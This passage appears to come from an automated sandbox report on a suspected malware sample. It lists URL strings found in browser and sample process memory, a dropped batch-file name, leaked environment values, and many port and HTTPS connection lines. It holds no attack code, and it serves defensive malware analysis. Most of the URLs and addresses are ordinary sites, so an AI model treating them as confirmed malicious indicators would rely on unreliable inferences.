Source: firefox.exe, 00000021.00000003.3097500857.00000169D9821000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: file.exe, 00000000.00000002.2426906219.0000000028B90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000021.00000003.3323676987.00000169D3446000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3095754802.00000169D98FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000021.00000003.3374410709.00000169D9DA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000021.00000003.3031385964.00000169D9F14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000021.00000003.2928245347.00000169C974A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2921875534.00000169C9707000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341844231.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000021.00000003.3236635003.00000169D97B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000021.00000003.3370039347.00000169CBD06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3385355519.00000169CBD1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: firefox.exe, 00000021.00000003.3234415020.00000169D9971000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3412223817.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3335596207.00000169D39CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3068413093.00000169D9971000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3239953611.00000169D3982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000021.00000003.3325995840.00000169CC2C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: firefox.exe, 00000021.00000003.3414526277.00000169CACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 00000021.00000003.3228316187.00000169CBEDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3304973847.00000169CC1E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197600394.00000169CBEDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3305729719.00000169CAD1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3263880810.00000169CA0FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000021.00000003.3258417572.00000169CC37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3352717738.00000169CC37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/anything/?
Source: firefox.exe, 00000021.00000003.3414526277.00000169CACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/about/legal/terms/subscription-services/
Source: firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/subscription-services/
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000021.00000003.3386641479.00000169CBCD6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: firefox.exe, 00000021.00000003.3246647026.00000169D1B76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3411645544.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3324674203.00000169D16D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000021.00000003.3239953611.00000169D3982000.00000004.00000800.00020000.00000000.sdmp, 5177.bat.23.dr String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 0000001F.00000002.2901568725.000002196FBF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: firefox.exe, 0000001C.00000003.2821879892.0000029FD2C6E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823432869.0000029FD2C81000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823704652.0000029FD3060000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2821980090.0000029FD2C80000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=e
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounts
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account~H
Source: firefox.exe, 00000021.00000003.3385355519.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3411645544.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comtype
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000021.00000003.3173677413.00000169CBD19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000021.00000003.3370039347.00000169CBD7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3336782696.00000169D38F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3172465493.00000169CBD7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3383948586.00000169CBD7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 59030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 59029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 50308 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 58925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50303 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 54094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58925
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 58885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 58931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 59028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50301 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59072
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 58926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown Network traffic detected: HTTP traffic on port 58938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50307 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54094
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59029
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59030
Source: unknown Network traffic detected: HTTP traffic on port 50305 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50300 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58879
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58877
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58882
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58884
Source: unknown Network traffic detected: HTTP traffic on port 58877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58881
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58880
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 59027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59065
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58931
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 50309 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50305
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50308
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50307
Source: unknown Network traffic detected: HTTP traffic on port 59031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50278 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50300
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50302
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50301
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50304 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59028
Source: unknown Network traffic detected: HTTP traffic on port 58881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59027
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49737 version: TLS 1.2
